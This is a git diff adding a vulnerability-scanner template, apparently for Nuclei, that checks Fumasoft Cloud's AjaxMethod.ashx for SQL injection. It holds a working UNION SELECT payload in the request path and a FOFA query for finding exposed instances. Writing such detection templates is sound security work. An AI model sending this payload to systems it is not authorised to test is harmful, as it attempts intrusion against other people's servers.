diff --git a/http/vulnerabilities/other/fumasoft-sqli.yaml b/http/vulnerabilities/other/fumasoft-sqli.yaml
new file mode 100644
index 0000000000..6faf0798e5
--- /dev/null
+++ b/http/vulnerabilities/other/fumasoft-sqli.yaml
@@ -0,0 +1,36 @@
+id: fumasoft-sqli
+
+info:
+  name: Fumasoft Cloud - SQL Injection
+  author: ritikchaddha
+  severity: critical
+  description: |
+    There is a SQL injection vulnerability in the AjaxMethod.ashx file of Fumasoft Cloud. Attackers can obtain server permissions through the vulnerability
+  classification:
+    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
+    cvss-score: 9.8
+    cwe-id: CWE-89
+  metadata:
+    max-request: 1
+    verified: true
+    fofa-query: title="Fumeng Cloud"
+  tags: fumasoft,sqli
+
+variables:
+  num: "999999999"
+
+http:
+  - method: GET
+    path:
+      - "{{BaseURL}}/Ajax/AjaxMethod.ashx?action=getEmpByname&Name=Y'+union+select+substring(sys.fn_sqlvarbasetostr(HASHBYTES('MD5','{{num}}')),3,32)--"
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        part: body
+        words:
+          - '{{md5(num)}}'
+
+      - type: status
+        status:
+          - 500